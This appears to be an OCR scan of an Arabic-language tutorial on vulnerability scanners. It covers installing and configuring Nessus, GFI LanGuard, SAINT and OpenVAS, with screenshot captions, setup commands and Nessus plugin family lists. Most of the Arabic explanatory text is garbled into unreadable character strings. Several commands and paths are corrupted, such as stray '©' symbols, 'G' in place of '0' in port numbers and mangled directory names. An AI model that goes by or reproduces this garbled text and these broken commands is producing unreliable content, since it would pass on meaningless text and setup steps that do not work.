• Tenable SecurityCenter users: Enter 'SecurityCenter 1 in the field above 

• To perform offline plugin updates, enter 'offline' in the field above 



Optional Proxy Settings 



< Prev Next > 







Next:Download Plugins 




^ A https: Jocalhost:S834/register/ 


v e 


H Google P| D' * * | ' fi +i~ 


Nessus 

vulnerability scanner 


Registering... 






Successfully registered the scanner with Tenable. 
Successfully created the user. 






Next: Download plugins > 
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^ CjlaLjaVI ^ d£j3! ^ o^asu (j^iloij lJjjujj tig n/n ^ (plugin) dAiLjaVI L-Ja. ^ I^jj c^jjuj Nessus 



Nessus is fetching the newest plugin set. 

^ A https:/ /localhost:8834/downloading/ 



Nessus 

vulnerability scanne 



Nessus is fetching the newest plugin set 



Please wait... 



The Nessus server is now downloading the newest plugins from Tenable which may take some time as we're testing for a lot of stuff. 

Then, the Nessus server will start processing the plugins, which is CPU / disk intensive and, therefore, takes a lot of time — this is all part of the installation 
process. Once the plugins are downloaded and processed, subsequent startups will be much faster. 

Since this operation is taking some time, here are some useful links: 

• Documentation : This page contains all of the manuals that you'll need to get the most out of Nessus and its features. 

• Discussion Forums : Do you need some help or want to interact with the Nessus community? This would be the place to go! 

• Nessus Video Tutorials : Our YouTube channel contains a lot of videos that will help new Nessus users get started, and experienced users to discover 
new features. 

• Support Portal : Manage your feed, open support tickets and get sample security policies (audit files). 

• Tenable Blog : Contains daily posts about new features for all of our products: Nessus, Security Center, the Log Correlation Engine (LCE), and the Passive 
Vulnerability Scanner (PVS). 

• Mandatory Sales Pitch: Do you intend to use Nessus to scan a large network? Take a look at Tenable SecurityCenter to see how you could leverage 
multiple scanners in your environment and share the results with the rest of your team. 

• Tenable Podcast : Tenable regularly holds a podcast where we discuss about major security events of the week. 

• Twitter : Yup, we're there too. 

Thanks again for installing Nessus, and for your patience while the plugins are getting downloaded and processed. We hope you'll enjoy Nessus 5's new 
features! 



Nessus is initializing... 



^ ft https://localhost8834/loading/ 



tt (? H- Google 



p ± ft * - * 



Nessus 

vulnerability scanner 



Nessus is initializing 



Please wait.. 



Nessus /Login 



A https: //localhost:S834/html5.html#/ 



P * ft 



Nessus 

home 



X janateba 



a 



S Remember Me 



tenable 
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(j^aLkl! qia jA\ <J-gIxj31 4_jujljaJI ^jW^ <^ j ^jMI 4_uiLuJI ^g-Iaj (Jj^ > lull A-ilxc. ^1^31 ax-jj Sign In ^* > ^ 

ic^VlS Nessus 



Nessus/ Scans 

I o c a I h ost: B834/ html5.htmf3 




{^Nessus 



Scans 



My Scans 

Trash 
► All Scans 
New Folder 



Upload 



Scans / My Scans 



No scans have been generated for this account. You can add a scan by clicking the "New Scan" button. 



|4gjtj J A.uuil gUaj 4JLLuJ) lj! jlaaJl NgSSUS £ 

^i^JI ^> jjjL j& j| JU^j^l [apt-get©install©nessus] jJa*JI ^jl* Cf Nessus f 
sbVl jl U&l [dpkg©-i©name_of_.deb_file_to_install] ^l^ki^l JjjL j& AiuE a! j ^,^ «l t 



a:-/Deskti # dpkg -i Nessus -5 . 2 . 6 -debian6_i386 . deb 
Selecting p reviously unselected package nessus . 

[Reading database ... 231873 files and directories currently installed.) 
Unpacking nessus (from Nessus -5 . 2 . 6 -debian6_i386 . deb) ... 
Setting up nessus (5.2.6) ... 

nessusd [Nessus) 5.2.6 [build N25116] for Linux 
Copyright (C) 1998 - 2014 Tenable Network Security, Inc 

Processing the Nessus plugins. . . 

[ ##################################################] 
All plugins loaded 

- You can start nessusd by typing /etc/init . d/nessusd start 

- Then go to https : //j ana : 8834/ to configure your scanner 

:~/Desktop# | 



:c5 jVI£ Jli* j^J! g-MI jkJ! tslli fhj ^ <y* U3^j L£ Nessus 1 
/opt/nessus/sbin/nessus-adduser 
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JIjjoj <J£ Ls lc aJl^\ . 4-*Kj a ikiuiAH ^juj! jllkj ^j! (ilio t . liLj l_s jjuj t'nessus-adduser' j*Vl jI-jj^] 

.Nessus ^ v^m^ l jI^U jki* 



:~/Desktop# /opt/nessus/sbin/nessus-adduser 
Login : noreen 
Login password : 
Login password (again) : 

Do you want this user to be a Nessus 'admin' user ? [can upload plugins, etc...) 

(y/n) [n] : y 
User rules 

nessusd has a rules system which allows you to restrict the hosts 
that noreen has the right to test. For instance, you may want 
him to be able to scan his own host only. 

Please see the nessus-adduser manual for the rules syntax 

Enter the rules for this user, and enter a BLANK LINE once you are done : 
(the user can have an empty rules set) 



/opt/nessus/bin/nessus-fetch©--register©your_reg_key 

j .Lia Aaa. j& Nessus .Tenable i> yr^ ^^Lall "your_reg_key" JI^U 



: -/Desktop* /opt/nessus/bin/nessus-fetch --register FD24-68C4-DQ59-392D-633C 
Your Activation Code has been registered properly - thank you. 
Now fetching the newest plugin set from plugins.nessus.org... 



4^VI I3a J j^ a*j 

^Ull j-<iVI cJ-a^jujj (Jjjia (jc Nessus ^1a1\ d$xJ£ &j 4^-Laaj ^uaLjaVl t— iU j^JI Jj^vi ^2 

/etc/init.d/nessusd©start 

[Unable to Connect] ^jS & i gLaZA S J}U <> Nessus J^ajJt j^liU jl^l J^iS Sjtej ^ 

.[/etc/init.d/nessusd©start]^t Sjtejj ^ijUl £iL ?J ij <|3* lit 
CjUuIxjII Sjj«j^a j& ^LiaVI (jj£-<JI .Nessus J ^-^j^ djU j^JI ^1 j& (plug in's) cAj j^JI 

13a .^jaLjaVl djU j£-<J! ^j-* < aV) ^11^ Nessus .^jj*-* c > ^> -U^j t>« .ja^iU t v^ti jl^aJt J] IgJLujj] *h c ^j3I ^li^jJI 

CjU j^JI L—Lj>iaJl] UjUIj Nessus c^-^^j^^^ ^^/v^l ^l^c] ^Iluj .^UjJI J^*-^ J j» Jj^^'^i J] ^^i^ ^ 

^ r https://127.0.0. 1:8834 1 J^^l <> Ml J ^1 j ±^J\ ^LaJ]^^ jll ^Nessus ^1 ^ 
jtjjc ^ 'https' ^ .(^ ^ Nessus J] J^»jJI ^ u^'j 251 ) (URL) ^ 

t's^l^jua jj>^2' j) (jj^j-a j^c- JL^aiil <JLojj' <JLojj L_Lj£]j 13] ,^LJI ^ Jt^ajVl ^1 JL^ajl ^Aa^Lujj Nessus URL 

l^liAaJ ^aJ ^^jII A A > CLjU j£-<JI j;i^Jj ^i^j ^la^ J^tIuij L_fl jjuj NeSSUS .6Ja*1uiaj g.1 jjIujI AiLjaU ^jVI ^3a JaL^j <Lj 

^^^uoLij^)!! Nessus ^-uiLuill ^ ciLoj^j ^Iluj t^c^U^JI j^-JI (Jj> * ^ ^^>?^ .^^^^^^ c_ujjj aIc l^UjjjU 

fib) j.>^lir> ^ gaJC ^jl jixJl JIgJ / ai> gall ^ ^3^1 ^ alia (JjjUaJ! ^jjS jUl <Jajuj| jJ NeSSUS L&^l <l3 

'(Users) a^ ^" » n^ t t(policies)^^U^I '(Templates)^^ '(scans)^^ '(results)^^ :^VI lU^j <iti^JI Nessus 
cjLujUjuJI 'e>^\ j ^ siilujV! ji (j-aj^xLxi pLujj] J] <^U^ ^jaifl t Nessus^l^^l ^ ^ u' .( con fig ura ti° n )^^^^ J 
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'policies' jjja jiill 4_LjuiI jj ^ ^ ^Uijj iilj£ _US <iuu31j Nessus ^> <^^j l^^o l^ij^su ^^sll 

^-a^ill ciL^l uj^ u' . (offline) <jj^ j' (J-^tj ^Uaijl jSaj '(Safe check) t>Vl 

jj^aLi a£jJo3I ^LLiil < . uaj t (Safe check) o*VI 

^j^xJI cilLiA j .Nessus ^-g-^ j ci^^ ^1 ^Viml (j^j cjLuA-ijuJ) ^ jj ^1 (j^>j> <^>Vn till ^--<<u.hj ^^jII t^a^ill djLujLijai JiHj 
,c*L ^aLiJI f.Luijj jl AjjjaljiiaVl 1^1 j ^^aJj New Policy ^ ^ policies (jjs 



Nessus / Policies 



^ A https: ^ocalhost:8834/html5.html*/policies 



P E- * # * - 6 



{^Nessus 



Policies 



Schedules Policies Us< 



Upload 



Policies/ All Policies 



No policies have been created. You can add new policies by clicking the "New Policy" button. 



rved Nessus Home 



^jja jl wizard c^-^ o^W^^ ^ ^ j * is "M^^ ^ New Policy c^-^ 1 ^ ^^>?^ 

.Advanced Policy j^^^ ^^j^ C5^^ 5-^^a3l ^j^jj li^J ^ j^lll tilj^^j Ia^jjj c _^j3I ^LojLluJI 



t 



T 



* Nessus 



Policies 



All Polici*s 



Schedules Polic 



Policy Wi/urdb 



il oprn portt 



rntimrrAtrt mmmo KOrtJitri 



□ 



Web Application TMti 



Windovwt Malwjro Scan 



Mobil* Device Scan 



j Basic ( o^j*^ Setting Type ^ 4JL&\ Advanced Policies Uir^W 

Ji^^L, >c jajVi s^Ml ^ tej*j*S\ ^ £jljUaJl t> jlrk J£ Jja jSjL Advanced jPerformancej Port Scanning 
lJ^j 11a .cjUL^Vi j '(plugins)^^V^ ^ 4 Credentialso^j^^ j 6 ' (General setting) cjbl^VI' 
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^joiLloi ^I^cV iaaa ^UaJS .V'u WV jjll jUl <iajoj| jJ 4 cilj£ aj tciL ^aLaJl (sCftll policies) (J^^^l CjLujLluj ^jjJJLJ ^JJ UJL^. 

^J^»^Q 4_ulL}jal al^JLudl (^g^ I^J^tS U.J^ 6< — ^ ,j^*t ,j^>«vq\1 4_LuAjjal ^Ludj! tiL ^1 ^ 11 ,j^««vq\I 

scan -^^jVI cjj* C5^) t^aaill jI^cV <j^aLiJI < *>\\\ ±^ ^a^ill aj tcijLajUjaj ^l^cj ^f^l ^ u*^ 

_<^ij^a3! (j-G jjujjVI t . uLaJI ^^ic ^ ja. 'New Scan' j ^ cs-^ ^ j*^ 



Nessus / Scans 

^- ♦ A https: localhost : i:4 html5.html#/scans 



{^Nessus 



Scans Schedules Policies Users 



Scans 



Upload 



Scans / My Scans 



My Scans 

Trash 
► All Scans 
New Folder 



No scans have been generated for this account, You can add a scan by clicking the "New Scan" button. 



'^j^aJI ^.ulaII' <jujLuj <^-^l <J£juJI lH^j .sj..".. 1 ^joixJ <LqI£1a1I 



Nessus / Scans / New Scan 

^ A https:, localhost:S834/html5.html#/scans/new 




P D- + # * - fi 



{^Nessus 



Scans Schedules Policies Users 



Scans 



< Scans 

Basic Settings 

Schedule Settings 
Email Settings 



New Scan / Basic Settings 



Policy 



Targets 



My Scans 



www.certifiedhacker.com 



Upload Targets 



(JpJLulj ^j£U3U m iAj <j^LaJl L_fll^VU ^J^alaJl ip q\ jJC <J-^j ^ 4<JujLljaJl ^.AaJ t^jull jJ Jl ^IjaJ (j^a^All A-AaxJ £,Aj3| (JjS 

jjll ^l^klaal oj t^gj^aj L_aL ^ <Ja o ^^13 jp (jjjUc; tiL^ 'Targets ^ h^j* IP uttJ-^ cJ^^j ^ 

a! j^a. j L-JIS pLuijj jl ojJjUxi ^j^aaill cJ^*-*^ c^c- SjjSSI till ja jj Nessus ^Ijl^aVI cj^I ,<iiAaj j <xi ^j^jl Add File 
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Udij ciL (j^aLiJI ^j^a^ill ^SjJI J ja. diL* jlx-o ^ till jj ^juj Nessus . J°'"^ J - *^ ^-s-^ J Lunch jjll (_3J* *J 

(J-lT-uull .llS 

iajjj^ J results jVI (jjfl ^Uill ^1 Jc \ jii jjSj < c> a^i]| ^uL^ ^ Nessus ^ 

AJlc ^auiaSI c <)■> > ^| JaliL 4-j^aLk <L^aJ 4 ^ NeSSUS. d^Jlial jll 4_liaVI djl^sull ^J*-> J 4-L^aLa <LojLL c*l*lJjjj ^JJjui jjj£i3l m ^j\ jsl\ 
J ^tjlUll ~ lalLudJ L_fl jjoj .^Uaill <J ja. <L*aLa CjUaa.!>L<i ^aJ^Jj ( ; u£ ^jc jJj£il! (jlal^xJjaiV CllS jll iaAj q\ < . LaJ .4_^pJl jl 

^jl Juijj tLal^l <J£3 L_a*jJa]| Jalaj <j^a^3j CjIjjjJI (J^aa3 Ulx^l Jflj 6^a.lj .^Uaill Jl J jj^ jll (j^a Jc J gaai] a JaaJI 

JV^ nessus ^t^o^V jt£fol 

J Plug ill's <-HjLaLo Jc A^lsu 4jI (JjS Lj£i L£j ;ciL 4j^alaJl all L_fl«jJall Jalij (j-saai J NeSSUS laJLujI -1 

Ubuntu Local Security Checks 
Default Unix Accounts 

a\\ac* J Plug in's ^— Jc Axusu aj! ci^ c>» Lj£i j t^lc a£jJo3I J < > ^31 Jataj (j^aai J Nessus ^I^Luit -2 

;iaaa AjjVI CjULJI Jl Ua ^-UaJ ^ jj^ tdlil ^-aaill 

CISCO 
DNS 

Default Unix Accounts 
FTP 

Firewalls 

Gain a shell remotely 

General 

Netware 

Peer-To-Peer File Sharing 

- Policy Compliance 
Port Scanners 
SCADA 

- SMTP Problems 

- SNMP 

- Service Detection 
Settings 

J Plug in's <«— iLaLo Jc axuxj 4i! Jja ^ Lj£i L^ j Jj.-Luull ^Ua3 J c > Jalaj ^j-aai J Nessus ^ l'V^*»l -3 

Backdoors 

- Brute Force Attacks 
CentOS Local Security Checks 
DNS 

- Debian Local Security Checks 

- Default Unix Accounts 
Denial of Service 
FTP 

- Fedora Local Security Checks 
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- Firewalls 

FreeBSD Local Security Checks 
Gain a shell remotely 
General 

Gentoo Local Security Checks 

- HP-UX Local Security Checks 

- Mandriva Local Security Checks 

- Misc 

- Port Scanners 

- Red Hat Local Security Checks 

- SMTP Problems 

- SNMP 

- Scientific Linux Local Security Checks 
Slackware Local Security Checks 

- Solaris Local Security Checks 

- SuSE Local Security Checks 
Ubuntu Local Security Checks 
Web Servers 

<js$ Plug in's ^-diL Cy* ^j^i ^ j Oj^j J^ * - ^ ^ c q»>^l Jalij <j-a^i Nessus fbVu«t -4 



Databases 

- Denial of Service 
FTP 

- SMTP Problems 

- SNMP 
Settings 

- Web Servers 
Windows 

Windows: Microsoft Bulletins 

- Windows: User management 





VULNERABILITY SCANNING TOOL: GFI LanGuard 




http ://www.gfi.com : j^-a^ll 



;4_JU3I CjVL^I ^ til^Loijj JuSLxjS Jaxj j& j m a1AA a<^1\ SjbV obi j& GFI LanGuard 



Patch management (cj Uj^^ I s jbl) 

Vulnerability assessment <» > ^ t JalSj ^j) 

Network and software auditing (^W^j^j ^f^' Ja^J j*) 
Asset inventory 



Mobile device management s ja^VI 6 j^>) 

Risk analysis ( jLLlJI JJ^i jl ^) 

Compliance j f'J^VI) 
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?GFI LANGUARD liUl 

.tgj ^jj^xi CAklfLlill ^1 dllJJJ S-ti-Ijj Ujlflij L_Lu£3l (Jq 

^ s j^Vl j (ajAJI ^al jJI ^ U) (Auditing software) J^^'/ojj^' jt (c 

.^i.ffl WVI AiiJU AilxUl jJjllillj Cjl^inU ^ (d 

^Uaj tdia jjoj jj^jUJ jsLol\ cj! > .^Ml jAj j ^jc c L^l] tilli j— (patch management) ^—^j^ > Sjl^j Jj» .2 

,ClJlii3l L_fl^)Ja3l ClAJLulaJ (j-a Ia jJC-j 4<i]La ^ixjaLill 

. (network auditing and monitor)4^Jl ^si *\ j^V .3 

(^lAl u^iJb fUil) PERFORM SECURITY SCANS 
c^jll ^ ui >C >VI o-a^i agent-based j agent-less t> l£ l^J** J GFI LanGuard Jj^j J^ult 

.agent-less 

<jujUja3l lajfl ^l^U^JI ^^^ic Jaxjjall ciiiinll ^jUt j (j^aLkl! Wizard ^W^k QJ« (><1 J-*^- -i- 

I* 



GFI LanGuard 2014 



Dashboard Scan Remediate Activity Monitor Reports Configuration Utilities 



Welcome to GFI LanGuard 2014 

GFI LanGuard 2014 is ready to audit your network for vulnerabilities 



Local Computer Vulnerability Level 

LanGuard has automatically enabled vulnerability 
auditing on the local computer. 




Current Vulnerability Level is: Not Available 



View Dashboard 

Investigate network vulnerability status and audit results. 



Remediate Security Issues 

Deploy missing patches, uninstall unauthorized software, turn on antivirus and more. 



|W Manage Agents 

Enable agents to automate network security audit and to distribute scanning load across client machines. 



Launch a Scan 



Manually set-up and trigger an agentless network security audit. 



LATEST NEWS 



| 29-Mar-2014 - vulnerability Database - Ust of supported OVAL checks - Read rr 



\ 29-Mar-2014 - Patch Management Database - List of supported Microsoft security updates - Read more 
I 29-Mar-2014 - Ust of supported non-Microsoft security updates - Read more 



;4JU3! j^ia Lunch a Scan ^ > *h i- 
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Dashboard | Scan | Remediate Activity Monitor Reports Configuration Utilities 



«£r Discuss this v 



Profile: 



v ... Full Scan 



Credentials: 


Username: Password 




Currently logged on user 


vir 


... | So. 



t^> Scan target: localhost 

0 O 192.168.138.1 [JANA-TEBA] (Windows 8 x64 Gold) 

B Networks Software Audit 
% Ports 
| 'A Hardware 
+ i Software 
+ C I System Information 



0 



Scan was stopped by the user! 

Summary of scan results generated during this network audit. 



Vulnerability level: 

This computer does not have a Vulnerability Level assigned. 

What does this mean 7 

Possible reasons: 

1 . The scan is not finished yet. 

2. Detection of missing patches and vulnerabilities is disabled from the scannin 
profile used to perform the scan. 

3. The credentials used to scan this computer do not allow the security scann< 
to retrieve all required information for estimating the Vulnerability Level. An 
account with administrative privileges on the target computer is required. 

4. Certain security settings on the remote computer block the access of the 
security scanner. Below is a list of most common issues: 

• Which settings are required to be able to scan a machine fully and 
successfully update missing patches using GFI LanGuard 7 

• What changes are required on a Windows XP SP2 / 2003 machine to 
allow GFI LanGuard to scan and deploy updates to it 7 

• Installing GFI LanGuard on Microsoft Windows Vista and Microsoft 
Window! Server 2008 ^ 

• What changes are required on a Windows Vista / 7 / 2008 machine to 



Scanner Activity Window 



,(3qV^ a\\ (j-oailt ^IjjI ^juj^ <-*jIS cr^s ^ ia^U) Full scan profile ^ 

,t*L oaUJI lUs <^ localhost Scan Target ^ 

^IM3 ^JUJI ^vim^ l ^^Axj ^j3Ij ^Ujlill currently logged on user Credentials Option <jUJI ^ 4- 

;4_JU3l 4_JiLi3! j^Jajj ^j^ail! aA^c l^jjfl scan ^» 1 u<< ^3 ^ 



» 14- 



Dashboard Scan Remediate Activity Monitor Reports 



GFI LanGuard 2014 

Configuration Utilities 



Estimated scan time remaining: 
Scan progress: 
Computers detected alive: 
Computers scanned: 
Profile: 



4 minutes 

^^^Z (1357 audit operations processed) 

1 computer(s) responded during network discovery 
Scan complete on 0 computer(s) 
Full Scan (Slow Networks) 



if) Scan target: localhost 

0 0 t» 192.168.138.1 [JANA-TEBA] (Windows 8 x64 Gold) 

SD Network & Software Audit 



;r Activity Window 



STARTING SECURITY SCAN FOR MACHIHE'RANGE: localhost 
Profile: Full Scan (Slow Networks) 



Initializing scan engine... 
Validating targets... 

Building computers list ... 



Network discovery Scan thread 1 (192. 168. 138. 1) Scan thread 2 (idle) Scan thread 3 (idle) Errors 



Ready 
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Dashboard Scan | Remediate Activity Monitor Reports Configuration Utilities 



Xif Discuss this v 



Scan Target: 



Full Scan (Slow Networks) 



Currently logged on user 



B ^ Scan target: localhost 

9 0!j 192.168.138.1 [JANA-TEBA] (Windows 8 x64 Gold) 

S) « Vulnerability Assessment 
B Network & Software Audit 



Vulnerability Assessment 

Select one of the following vulnerability categories bellow 



High Security Vulnerabilities (3) 

Allows you to analyze the high security vulnerabilities 

Medium Security Vulnerabilities (1) 

Allows you to analyze the medium security vulnerabilities 

Low Security Vulnerabilities (5) 

Allows you to analyze the low security vulnerabilities 

Potential Vulnerabilities (5) 

Allows you to analyze the information security vulnerabilities 



Scanner Activity Window 



Time 

3/29/2014 11:43:41 AM 



Computer 

JANA-TEBA 



Operation 

Missing patches scan 



Error Message 

The patch management database is unavailable 



Network discovery Scan thread 1 (idle) Scan thread 2 fjdle) Scan thread 3 (idle) Errors 



^j^i^ll Vulnerability * ^ Aii^a^H j jju^VI < ; ulaJl ^a^ill ^jUj ^-i^ ^j^aill ^ a*j 

jAa j^Lill j all j ^j^aLiJI Nwtwork& Software ^ ^ t * a '* 1 u ^ -^1^ 
.onailt j ^U 4^jU3I ^ Dashboard ^ > ^ 1 c jSaj 



4- 

n ■ 



GFI LanGuard 2014 



•> I «- I ■ 



Dashboard Scan Remediate Activity Monitor Reports Configuration Utilities 



HI) * Discuss this version... 



I- 

Group 



j 5: Entire Network 

Localhost : JANA-TEBA 
► f ' Local Domain : WORKGROUP 
| Mobile Devices 



IS 
Overview 



5? 


$ ^ .4 


> 


0 




Computers 


History Vulnerabilities Patches 


Ports 


Software 


Hardware 



w 

System 
Information 



' JANA-TEBA (1 92.1 68.1 38.1 ) 

^ Security Sensors 



^ Vulnerability Level 




\ Software Updates 



k Service Packs and Update 
' Rollups 

Vulnerabilities 



Top 5 Issues to Address i 

A AutoRun is enabled 

^ Windows Defender has detected 
spyware 

A, Windows Defender has detected 
viruses 

^ OVAL: 12566: Microsoft Windows 
Human Interface Device (HID) 
driver is prone to security bypass 
vulnerability. 

A, AutoShareServer 



1 

^ P.lalware Protection Issues 

^ Firewall Issues 

^ Unauthorized Applications 

© Audit Status 

^ Credentials Setup 

IB Agent Health Issues 



Computer Details 








g J Operating System 


Windows 8 x64 (SP: Gold) 






. / Network Role 


Workstation 






./ Language 


English (United States) 






OS Install Date 


2/10/20 14 6:02:47 PM 




V 


Scan Activity 












3 






2 














: 2= 2 j- A 




Last Scan: 3/29/20 14 1 1: 3 1: 35 AM 








1 Scan Activity | Remediation Activity | 



Common Tasks: 



Manage agents,.. 

Add more computers. , , 

Scan and refresh information now 

Custom scan... 

Set credentials... 

Deploy agent. . . 



Agent Status 

Agent Not Installed 
8fr Deploy Agent 
Click here to learn more about agents. 

Vulnerability Trend Over Time 



¥ Results Statistics 

A Other Vulnerabilities: 9 (3 Critical /High) Potential Vulnerabilities: 5 

4£ Installed Applications: 112 (0 unauthoriz... ^ Open Ports: 16 
ft Shares: 11 USB Devices: 6 (0 blacklisted) 

•6* Netwnrk Devirp*: ?1 fn hUrktetprfi 4* Servire<;: 191 



" 3" 
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VULNERABILITY SCANNING TOOL: SAINT 

http ://www.saintcorporation.com : j^-a-JI 
Uj a^u^W jic ^Lkj ^ ( \y^<~\\ Jalia jj^l -\: <SbVl ^l^klojU >c >Vl ^j>u^J <L»l£l<i sbl SAINT 

jV j 'IPv6 j' IPv4 ^I^aVI J^IxjjujI j (j^i'sqj <^U ^-aujj _^clt jiiLJI iat_L<JI j JjxjuHK ^Uaj ^1 ji\ JLo CjLg jLlaII 

.URL ub^ 

.AjuUoII t 'a- > Jataj ^Uaj ^iaJ "2 

HIPAA 'GLBA 'SOX FISMA < NERO PCI DSSJi« ^1 ^U^llj ^.jSaJI ^Ijll Jlfi-VI -3 

COPPA 



Vuir\#f*bti.t> Scanner 




<> mil 




• ALUS 



II 

JJ 



I* 



VULNERABILITY SCANNING TOOL: OPENVAS 

Ua^J < fljujal ) ^xii^il l^l^iuil jSaj ^1 jli^ 6 bl t [Open Vulnerability Assessment System] , OpenVAS 
jja ^1 jj^j £ja-\\\ UU^ X»l£ ^-li* J*t£ Feed ^ ^ <Nessus o^j .Nessus ^ jj^l c> j& 

I^j c_a jjojj (jALl ^ Ajjjaljja! sbt£ OpenVAS ^ 



I Jtia JSII jUaj Jjjla CP <i u^Lklt jI^aM J^W OPENVAS ^ J <^¥) j CjjjIU! ^ ijj UjPJ 

/ ^ i^iLujI <J^i ^ o^l^cl ^jj ^ji .kaa ^Ii^j t^^jjaljiial <J^-^ L "*y* OpenVAS -1 

:^U3I j*¥l ^l^ki^U OpenVAS ^ c^ 11 c> -2 

#cd©/usr/share/openvas/ 

: j*Vl iiii -3 
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#openvas-mkcert 

: OpenVAS SSL & ^ Sj^ 1 l?* ^ 

.ja U^CA ^1 j^VI j^J! t*S jjj -1 

.1460 : CAfi^ A$ fal^l ^u^i -2 

.^L3I Jkji -3 

.*1*jj5U Enter JL^VI ^Sts t*U 



Creation of the OpenVAS SSL Certificate 

Congratulations. Your server certificate was properly created. 

The following files were created: 

. Ce rtif ication autho rity : 

Certificate = /va r/lib/openvas/CA/cace rt . pem 
Private key = /va r/lib/openvas/p rivat e/CA/cakey . pem 

. OpenVAS Server : 

Certificate = /va r/lib/openvas/CA/se rve rce rt . pem 
Private key = /va r/lib/openvas/p rivat e/CA/se rve rkey . pem 

Press [ENTER] to exit 
I 



#openvas-nvt-sync 

; j^Vt L_a»jja3l Jalij cjL^ jai J£ -uli .^JUJl NVT ^ OpenVAS NVT <iJ li* 



rootQjana :/usr/share/openvas# openvas -nvt -sync 

[i] This script synchronizes an NVT collection with the 'OpenVAS NVT Feed 1 . 

[i] The 'OpenVAS NVT Feed' is provided by 'The OpenVAS Project'. 

[i] Online information about this feed: ' ht t p : //www . openvas . o rg/openvas -nvt - feed 

.html'. 

[i] NVT dir: /var/lib/openvas/plugins 

[i] rsync is not recommended for the initial sync. Falling back on http. 

[i] Will use wget 

[i] Using GNU wget : /usr/bin/wget 

[i] Configured NVT http feed: http://www.openvas.org/openvas-nvt-feed-current.ta 
r.bz2 

[i] Downloading to : /tmp/openvas-nvt -sync . j sQ0K20hia/openvas-feed-2G14-03-29-541 
4.tar.bz2 

- -2014-03-29 16 : 16 : 45- - http : //www . openvas . o rg/openvas -nvt -feed -current . tar .bz2 
Resolving www.openvas.org (www .openvas .org) .. . 5.9.98.186 

Connecting to www.openvas.org (www. openvas .org) | 5 .9 .98 . 186 | :80 . . . connected. 
HTTP request sent, awaiting response... 200 OK 
Length: 14661655 (14M) [application/x-bzip2] 



#openvas-mkcert-client©-n©om©-i 
#openvasmd©--rebuild 

-C5 J| jilll CJlLiA\ S^ctS pUj S^lcjj cJ^AStJl S^tgJUO ^LuuL L_fl ^juj 

#openvassd 
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.ciia j]| (j^asu (jjxlou j ^^jIjSJ! I^a 34491 cs-^ J^) ^-^-^V^ ^-i^ Jj^vi j OpenVAS u^^v ^ 



:/usr/share/openvas# openvassd 
All plugins loaded 

rootgjana :/Lisr/share/openvas# | 



#openvasmd©--rebuild 
#openvasmd©— backup 



:(openvasadmin ^^Luj) jbVI ^vim^ l *t£>V Jtill j*Vl ijaiL ^ -8 
#openvasad©-c© , add_user , ©-n©openvasadmin©-r©admin 



: # openvasmd - 


- - rebuil 


d 






:/usr/sh re/openvas# openvasmd 


- -backup 








:/usr/share/openvas# openvasad 


-c 'add_ 


user 1 -n o 


penvasadmin - 


- r admin 


Enter password : 










ad main : MESSAGE : 14689 :2Q14-03 -29 2Qh56 


14 EDT: 


No rules 


file providec 


i, the new 


user will have no restrictions. 










ad main : WARNING : 14689 :2014-03-29 2Gh56 


14 EDT: 


Failed to 


create user 


openvasad 


min ! 










:/usr/share/openvas# | 











[^JUl! j*Vi \:° v; ; ^ jSj -9 

#openvas-adduser 



.(Ai^L^JI ^ jxJt ^UK UUli jIilj liA) {authentication request} ^t^JI ^ Enter J**^l .2 

. Ctrl + Dii^l jill .4 



root@j ana : /us r/sha re/open vas# openvas -adduse r 
Using /va r/tmp as a tempo ra ry file holde r . 

Add a new openvassd user 



Login : janateba 

Authentication ( pass/ce rt ) [ pass] 

Login password : 

Login passwo rd ( again) : 



User rules 

openvassd has a rules system which allows 
a has the right to test . 

For instance, you may want him to be able 



you to restrict the hosts that janateb 
to scan his own host only. 



Please see the openvas -adduse r ( 8) man page for the rules syntax. 

Enter the rules for this user, and hit ctrl-D once you are done: 
(the user can have an empty rules set) 

I 



;OpenVAS W*- 0 j" cs^' ^aliaJl u^j^ jVl V"; ^ -10 

#openvasmd©-p©9390©-a©127.0.0.1 
#openvasad©-a©127.0.0.1©-p 9393 
#gsad©--http-only©--listen=127.0.0.1©-p©9392 
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a tiL A dlldj j ^LuaU 4j jaJ) ILU) 9392 J^la 



:/usr/share/openvas# openvasmd -p 939G -a 127. 
:/usr/share/openvas# openvasad -a 127. G.0.1 -p 9393 
:/usr/share/openvas# gsad - -http-only - -listen=127 . 



G.G.I -p 9392 



.OpenVAS ^jo^j^ 'url <J http://127.0.0.1:9392 <4>1 ^ Jl -11 



Greenbone Security Assistant - Iceweasel 



lceweaseL v j Greenbone Security Assistant 



| 1Z7.Q.0.1:9392/Login/Login.html 



^ C] [[_J V Gi 



St 




Username | 
Password 



Login 



CjIjUj %±c\k UUiji , (repository)uj3^^ OpenVAS -^-^.jj j J^j^i siaU ^ Uta j£] <(3f^ 

OpenVAS s-^j^ ^-s-^j ^j^-' ^ l^j^V^ ~ .^i JSi l-jL ^ UjUijl ^2 .UjJ ^cLaa>JI ^LxAj^JI cIujjjj s^l ^ *\\\ 

_(J ^^^31 (Jjl^jaaJ 4_jujLuj £A du^a j 

.CjUUJI dJ&l£ f Luul dJl^l ^J) ^H^j <_flj*uud t OpenVAS I J^VI o^u liliL ^ jSj Sj-a J£ ^ ;AJa j^ia 

: OpenVAS cr^j £*Ujj ? Uti) • 

-(^' 'OpenVAS ^ s-^ 

.(Saja*. c > >\ Jalaj c fll un^l UJ£ ^jj C— gAa2»> Lajh J laj > >i) NVT Feed 3-^1 ~1 

.OpenVAS o-^ -2 

.dAiUJ! %±zXk *Lud SjIcI -3 

,t*L <j^aUJI ialiJI (jjj^i -5 

OpenVAS.sh ^-al*31 li* hq^j ^ .OpenVAS ^ £^£5 q\ IgiLi ^ k^j Lua «<^a jll jjjSII ilS^V 

:/root 



#!/bin/bash 

openvas-nvt-sync 

openvassd 

openvasmd -rebuild 

openvasmd —backup 

openvasmd -p 9390 -a 127.0.0.1 

openvasad -a 127.0.0.1 -p 9393 

gsad -http-only -listen=127.0.0.1 -p 9392 



Using the OpenVAS Desktop • 
4_£^Jj injoi^ (Jjfiaj jA c-u£ oil ^Jaui OpenVAS .<-^a!I ^laui OpenVAS <— i\ jlaaJI ^^ij iiiii ^ tUjUik! 

■l3J- ^-Ail _A-L<i jjuj^)3I ^Vim^l 
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Applications I Kali Linux I Vulnerability Assessment I Vulnerability Scanners I OpenVAS I openvas- 
setup 

i^Vl^ ^Aj^alall J^lk (JjjJ j '^lia jjujjII A-a. jit J!)Lk ^ Openvas J^ *^ j 
Applications I Kali Linux I Vulnerability Assessment I Vulnerability Scanners I OpenVAS I openvas- 
gsd 



FiLe Task View Settings Extras H eLp 



s E3 i □ a a i 



